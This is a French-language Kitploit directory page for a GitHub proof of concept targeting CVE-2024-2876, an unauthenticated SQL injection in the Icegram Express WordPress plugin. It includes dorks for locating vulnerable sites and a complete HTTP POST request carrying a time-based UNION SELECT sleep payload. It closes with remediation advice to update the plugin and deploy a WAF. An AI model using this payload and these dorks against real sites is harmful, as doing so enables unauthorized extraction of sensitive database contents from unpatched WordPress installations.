Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-2876 | Kitploit
Outils/GitHubGitHub/chsxthwik/cve-2024-2876
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubchsxthwik/cve-2024-2876

CVE-2024-2876

Voir le dépôt
22il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-2876

#Description de la vulnérabilité: Le plugin Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce pour WordPress est vulnérable à l'injection SQL via la fonction ‘run’ de la classe ‘IG_ES_Subscribers_Query’ dans toutes les versions jusqu'à la 5.7.14 incluse, en raison d'un échappement insuffisant sur le paramètre fourni par l'utilisateur et d'une préparation insuffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires aux requêtes déjà existantes, qui peuvent être utilisées pour extraire des informations sensibles de la base de données.

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#POC Youtube: https://www.youtube.com/watch?v=eDEGt_xXyvE

#Comment corriger ? Étant donné que toutes les versions jusqu'à la 5.7.14 sont concernées par la CVE, il est recommandé aux utilisateurs de mettre à jour le plugin Email Subscribers by Icegram Express vers la version 5.7.15 (ou la version la plus récente, la 5.7.19). Les utilisateurs de Patchstack ont la possibilité d'activer les mises à jour automatiques spécifiquement pour les plugins vulnérables. Implémentez une solution WAF/WAAP comme couche de protection supplémentaire. L'avantage de telles solutions est que, même si la vulnérabilité est nouvelle et inconnue (0-day), elles peuvent néanmoins empêcher les attaques en détectant les schémas et techniques d'exploitation.

#Ressource: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

Télécharger l’outil